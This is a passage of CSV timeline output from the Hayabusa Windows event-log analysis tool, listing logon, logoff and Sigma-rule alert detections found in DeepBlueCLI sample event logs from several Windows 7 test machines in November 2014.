memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 
0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 
07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
-2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:15:39.306 +09:00,IE9Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : 
Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
